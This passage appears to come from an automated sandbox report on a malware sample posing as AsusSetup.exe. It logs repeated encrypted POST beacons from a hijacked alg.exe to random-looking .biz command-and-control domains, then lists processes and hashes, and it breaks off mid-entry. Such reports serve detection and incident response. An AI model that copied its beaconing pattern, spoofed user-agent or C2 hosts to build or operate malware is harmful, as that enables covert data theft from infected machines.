                                                                                                                                                                                                                                                                                                                                                                                                                  130192.168.2.56000618.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.878051043 CET350OUTPOST /gidkqlg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.878078938 CET778OUTData Raw: 0a ba 40 5f 9f fc be 5a fe 02 00 00 7e 41 2e 80 7e ba 0e 31 be 91 4f 47 81 2b b7 40 40 7e ad a5 db 2d d9 e3 45 ad bf 26 9a 1d 32 c2 9a 1d 17 b6 1c 75 07 25 22 04 c2 9a 80 b9 52 d3 17 59 1d 87 d8 57 05 d7 f0 ba 74 65 c9 87 03 fc 8a 94 ad 0b 2d 02
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: @_Z~A.~1OG+@@~-E&2u%"RYWte-ek|C,&xqId~pY5_GZU:TBE8%+{a#6Y$!rLk$?K'K<-<Y]>WnV?XQ&=
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.319886923 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=1566c29bdb14d1b3e9c7fe5e9e8a2995|155.94.241.188|1730130772|1730130772|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  131192.168.2.56000754.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.344511986 CET345OUTPOST /oiol HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.344528913 CET778OUTData Raw: 93 54 61 7a e3 3e 55 c8 fe 02 00 00 dc 71 5b 55 d5 80 19 35 16 c1 cd 58 12 3f c3 ac e7 71 23 bc ca e1 81 99 d4 21 8e a0 26 3e 77 91 94 9a 43 fd 89 73 60 fd 67 71 2c fa cd 06 8b a5 b6 8e 9c 74 2b ae 0f d7 40 7a df 65 f7 ae df e3 a5 ca 68 fd 28 3c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Taz>Uq[U5X?q#!&>wCs`gq,t+@zeh(<rH4W[:")pS:AY(^Ev?,lur;_wD&wzi}Ono6Zk`BuGh*7zYs!%YXA
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.174709082 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=908e3d99f5966c9a7d0a98e4515e412b|155.94.241.188|1730130773|1730130773|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  132192.168.2.56000844.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.628225088 CET354OUTPOST /clexsjcapi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.628277063 CET778OUTData Raw: 1f 1f 88 ff b6 a7 46 04 fe 02 00 00 79 ff 04 25 dc 29 35 15 0a ed eb 0b fd 61 1f 4c 45 c2 9a 4b f1 2e 97 f5 49 b7 42 4a a7 79 b3 dd e0 3f 59 8e 25 64 42 b3 8f 27 da 72 0e 68 6d 96 a9 29 ec 9a cd c9 8a 59 56 93 f0 17 e7 25 4b b0 1f 44 48 b2 16 c6
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Fy%)5aLEK.IBJy?Y%dB'rhm)YV%KDHkLyT4zE .+DI@: "Mo67cWc%KS*l)E8)+eMip}tMUnRHkpfdf;i]Q=Q4w!+d3KA-R`zP<I^<,
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.304781914 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=3543659cc3d3a9c95d4db311b00fa683|155.94.241.188|1730130774|1730130774|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  133192.168.2.560009172.234.222.143802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.326935053 CET349OUTPOST /inwjou HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.326935053 CET778OUTData Raw: e5 77 7e 27 21 bd fd f7 fe 02 00 00 b2 00 18 47 f7 32 15 52 5a 31 f2 f6 10 df a7 89 8c d0 05 7b 7c 9c 34 fd 53 9f 5e e7 a8 74 bd 93 2f e6 7a 94 12 f2 82 bb 3c 37 3c eb 31 ed b3 81 83 b4 cc 62 9a aa 8d a3 92 09 9d a6 26 7e 81 29 0b 3b e2 4b 63 ca
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: w~'!G2RZ1{|4S^t/z<7<1b&~);Kcv.ZLW0(18@xCX(qi28GWgp4XHjb;F6IDlaNs3r,0r;(fAvI-&z,2$&(`4h39"g


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  134192.168.2.560010172.234.222.143802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.000348091 CET349OUTPOST /ejhxrp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.000415087 CET778OUTData Raw: 75 0c 29 5b 99 11 03 4e fe 02 00 00 20 37 05 fb ba 6c 27 79 03 95 cd 5c a4 73 ab 17 7d da 61 b8 45 50 42 99 2c 0a c7 e4 e9 19 9e f0 60 79 20 f8 fc c0 ba 4f 8c 3b 01 7b 33 f9 57 65 30 0e e4 7b 89 e3 dd a1 58 27 be 06 97 ae 4c 2d c6 b7 49 8b 2f 2c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: u)[N 7l'y\s}aEPB,`y O;{3We0{X'L-I/,|([@#)wDI(DzSEhNFeL^BZ-RdD.'LIYvU%^atc _kX!MV"2Wl\[yLI


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  135192.168.2.56001118.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.959419012 CET346OUTPOST /kt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.959434032 CET778OUTData Raw: d1 71 d7 c2 df 5a 20 1c fe 02 00 00 72 62 ae b5 b2 7c 8c fb 6b cc 5c ee 86 34 f2 9a 8b 6b b0 21 2e 56 7b ba 4b 87 a1 83 0c af 96 70 77 45 14 ee d1 38 ca 18 5c dc 8a c8 0f 82 1c ec 83 5c 32 07 2f 85 4f 04 72 8e e3 74 18 54 ea 4d 91 e8 23 cd 66 4b
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: qZ rb|k\4k!.V{KpwE8\\2/OrtTM#fK:]2XF!XJ0=gv4'gjXGPgo0LL{s|&&-@n'wP0DBzkF(^op|\{sz9ucPF-yy~61 &^!-0GV9L
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.789963007 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cc06133a1e38341c1b3ccfce878420dd|155.94.241.188|1730130777|1730130777|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.789998055 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cc06133a1e38341c1b3ccfce878420dd|155.94.241.188|1730130777|1730130777|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  136192.168.2.56001282.112.184.197802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.835853100 CET355OUTPOST /ctmnxqregqafw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.835887909 CET778OUTData Raw: bc 1f f0 bb 13 94 66 1c fe 02 00 00 45 52 c8 29 66 49 d6 96 cc 20 fb 17 cb f0 4c 1f 5d ce 8f 5a bb b5 ef ac e7 9e 83 ec b5 3c 95 8a 2c 03 7b b5 83 93 62 a9 1b f4 4d 47 db f0 b3 10 92 60 d2 88 e5 b8 5d ea 98 61 96 c1 ed cb 27 c7 5a 71 7d 69 e5 75
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: fER)fI L]Z<,{bMG`]a'Zq}iuA2X |+q ?'f.faNmhg:DthP.oE!Uo:t<mJ;d^G#Zm/%flC:~G&U${Gl*$Mnw^


                                                                                                                                                                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:56
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\AsusSetup.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:5'251'072 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:13BF2819401D2F983FFF90C1960831B8
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:56
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:1'445'888 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:828741995F05BE2FD6B071628F96F6B9
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:57
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:1'381'376 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:332F38054E08BAEC551611993C8D1317
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:57
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:138'056 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:57
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:174'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:57
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:154'952 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:57
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:2148D94316FBFFE84543113C6A3C1FA4
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:59
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:1'242'624 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:5E3D1E384655DE6087F47BBB3A38FB17
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:50:00
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:2'354'176 bytes
